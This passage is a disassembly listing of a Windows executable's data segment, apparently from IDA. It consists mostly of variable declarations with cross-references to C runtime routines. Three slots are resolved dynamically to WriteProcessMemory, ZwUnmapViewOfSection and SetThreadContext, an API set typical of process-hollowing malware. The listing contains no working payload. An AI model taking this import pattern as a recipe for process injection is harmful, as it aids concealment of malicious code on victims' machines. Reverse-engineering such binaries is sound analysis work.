; sub_40171B+2F�w ...
dword_43E520 dd ? ; sub_4015A2+74�w ...
dword_43E524 dd ? ; resolved to->KERNEL32.WriteProcessMemory ; sub_405FA0+17�w
dword_43E528 dd ? ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_405F66+17�w
dword_43E52C dd ? ; resolved to->KERNEL32.SetThreadContext ; sub_405F83+17�w
; char *dword_43E530
dword_43E530 dd ? ; __setenvp:loc_4036D6�r ...
align 8
dword_43E538 dd ? ; .text:_fast_error_exit�r ...
dword_43E53C dd ? ; .text:004030D1�w ...
; int dword_43E540
dword_43E540 dd ? ; _realloc:loc_405050�r ...
align 10h
dword_43E550 dd ? dword_43E554 dd ? dword_43E558 dd ? dword_43E55C dd ? ; ___heap_select+9�r ...
dword_43E560 dd ? dword_43E564 dd ? dword_43E568 dd ? align 10h
; void *dword_43E570
dword_43E570 dd ? ; __setenvp:loc_403775�r ...
align 10h
dword_43E580 dd ? align 8
byte_43E588 db ? ; DATA XREF: _doexit+2D�w
align 4
dword_43E58C dd ? dword_43E590 dd ? dword_43E594 dd ? dword_43E598 dd ? ; __XcptFilter+73�w ...
align 10h
; char Filename[]
Filename db 104h dup(?) ; DATA XREF: __setargv+1C�o
byte_43E6A4 db ? ; DATA XREF: __setargv+23�w
align 4
dword_43E6A8 dd ? ; ___crtGetEnvironmentStringsA+24�w ...
dword_43E6AC dd ? ; ___crtMessageBoxA+38�w ...
dword_43E6B0 dd ? ; ___crtMessageBoxA:loc_40436E�r
dword_43E6B4 dd ? ; ___crtMessageBoxA+D6�r
dword_43E6B8 dd ? ; ___crtMessageBoxA:loc_404329�r
dword_43E6BC dd ? ; ___crtMessageBoxA+9C�r
dword_43E6C0 dd ? ; .text:004047C6�w ...
align 8
dword_43E6C8 dd ? ; __ValidateEH3RN+13F�r ...
align 10h
dword_43E6D0 dd ? ; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(?)
; volatile LONG Target
Target dd ? ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_43E714 dd ? ; .text:00405293�r ...
align 10h
; LCID dword_43E720
dword_43E720 dd ? ; ___crtGetStringTypeA+14A�r ...
align 10h
; UINT dword_43E730
dword_43E730 dd ? ; __setmbcp+4F�r ...
align 8
dword_43E738 dd ? ; ___crtLCMapStringA+31�w ...
dword_43E73C dd ? ; ___crtGetStringTypeA+2E�w ...
; LCID Locale
Locale dd ? ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_43E744 dd ? ; __setmbcp+14D�w ...
dd 6 dup(?)
byte_43E760 db ? ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_43E761 db ? ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 40h dup(?)
; UINT CodePage
CodePage dd ? ; DATA XREF: __ismbbkana�r _setSBCS+10�w ...
align 10h
dword_43E870 dd 4 dup(?) ; __setmbcp+162�o ...
byte_43E880 db ? ; DATA XREF: _setSBUpLow:loc_40496A�w
; _setSBUpLow:loc_404987�w ...
align 4
dd 3Fh dup(?)
; UINT uNumber
uNumber dd ? ; DATA XREF: __ioinit+1F�w
; __ioinit:loc_403B44�r ...
dd 7 dup(?)
dword_43E9A0 dd ? ; __ioinit+3C�r ...
dword_43E9A4 dd 3Fh dup(?) dword_43EAA0 dd ? ; .text:00403C7F�o
dword_43EAA4 dd ? ; _doexit:loc_40321B�r ...
; void *dword_43EAA8
dword_43EAA8 dd ? dword_43EAAC dd ? ; __setenvp+3�r ...
dword_43EAB0 dd ? align 8
; void *dword_43EAB8
dword_43EAB8 dd ? ; ___sbh_free_block+21C�r ...
dword_43EABC dd ? ; .text:0040211C�r ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: .text:004020E2�r
; .text:loc_402126�r ...
dword_43EAC4 dd ? ; __get_sbh_threshold+E�r ...
dword_43EAC8 dd ? ; ___sbh_free_block+300�w ...
dword_43EACC dd ? ; ___sbh_alloc_new_region+5�r ...
dword_43EAD0 dd ? ; ___sbh_free_block+249�r ...
; HANDLE hHeap
hHeap dd ? ; DATA XREF: __heap_alloc+38�r
; __heap_init+19�w ...
dword_43EAD8 dd ? ; __heap_alloc:loc_4019D1�r ...
dword_43EADC dd ? ; __wincmdln:loc_403678�r ...
_data ends
end start